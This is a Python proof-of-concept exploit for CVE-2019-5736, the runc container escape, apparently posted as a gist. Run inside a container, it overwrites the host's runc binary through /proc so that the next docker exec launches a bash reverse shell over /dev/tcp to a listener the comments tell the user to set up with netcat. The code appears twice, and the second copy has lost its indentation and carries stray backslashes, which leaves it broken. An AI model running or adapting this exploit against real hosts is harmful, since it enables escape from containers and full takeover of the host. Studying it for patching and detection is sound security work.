singe/cve-2019-5736.py

## cve-2019-5736.py
#!/bin/python3
# Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief)
# Target will need a python3 interpreter
# Edit IP info below, on the host run a netcat to catch the reverse shell
# Run this python file in the container
# Then from the host: docker exec -i <container name> /tmp/evil
import os
import stat

host='172.17.0.1'
port='5000'
payload=f'#!/bin/bash\necho "exec 5<>/dev/tcp/{host}/{port} && cat <&5|/bin/bash 2>&5 >&5"|/bin/bash\n'
target_file='/tmp/evil'

if __name__ == '__main__':

  with open(target_file,'w') as evil:
    evil.write('#!/proc/self/exe --criu')
    os.chmod(target_file,stat.S_IXOTH)

  found = 0
  while found == 0:
    procs = os.popen('ps -A -o pid')
    for pid in procs:
      pid = pid.strip()
      if pid == 'PID': continue
      if int(pid) > os.getpid():
        try:
          with open(f'/proc/{pid}/cmdline','r') as cmdline:
            if cmdline.read().find('runc') >= 0:
              found = pid
        except FileNotFoundError:
          continue
        except ProcessLookupError:
          continue

  handle = -1
  while handle == -1:
    try:
      handle = os.open(f'/proc/{found}/exe', os.O_PATH) #/proc/xxx/exe is fd to runcinit
    except FileNotFoundError:
      continue
    except PermissionError:
      continue
  print('Got file handle')
  write_handle = 0;
  while write_handle == 0:
    try:
      write_handle = os.open(f'/proc/self/fd/{str(handle)}',os.O_WRONLY|os.O_TRUNC)
    except OSError:
      continue
  print('Got write handle')
  result = os.write(write_handle,str.encode(payload))
  if result == len(payload):
    print('Successfully wrote payload')
  else:
    print('Could not write')
	#!/bin/python3
	# Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief)
	# Target will need a python3 interpreter
	# Edit IP info below, on the host run a netcat to catch the reverse shell
	# Run this python file in the container
	# Then from the host: docker exec -i <container name> /tmp/evil
	import os
	import stat

	host='172.17.0.1'
	port='5000'
	payload=f'#!/bin/bash\necho "exec 5<>/dev/tcp/{host}/{port} && cat <&5\|/bin/bash 2>&5 >&5"\|/bin/bash\n'
	target_file='/tmp/evil'

	if __name__ == '__main__':

	with open(target_file,'w') as evil:
	evil.write('#!/proc/self/exe --criu')
	os.chmod(target_file,stat.S_IXOTH)

	found = 0
	while found == 0:
	procs = os.popen('ps -A -o pid')
	for pid in procs:
	pid = pid.strip()
	if pid == 'PID': continue
	if int(pid) > os.getpid():
	try:
	with open(f'/proc/{pid}/cmdline','r') as cmdline:
	if cmdline.read().find('runc') >= 0:
	found = pid
	except FileNotFoundError:
	continue
	except ProcessLookupError:
	continue

	handle = -1
	while handle == -1:
	try:
	handle = os.open(f'/proc/{found}/exe', os.O_PATH) #/proc/xxx/exe is fd to runcinit
	except FileNotFoundError:
	continue
	except PermissionError:
	continue
	print('Got file handle')
	write_handle = 0;
	while write_handle == 0:
	try:
	write_handle = os.open(f'/proc/self/fd/{str(handle)}',os.O_WRONLY\|os.O_TRUNC)
	except OSError:
	continue
	print('Got write handle')
	result = os.write(write_handle,str.encode(payload))
	if result == len(payload):
	print('Successfully wrote payload')
	else:
	print('Could not write')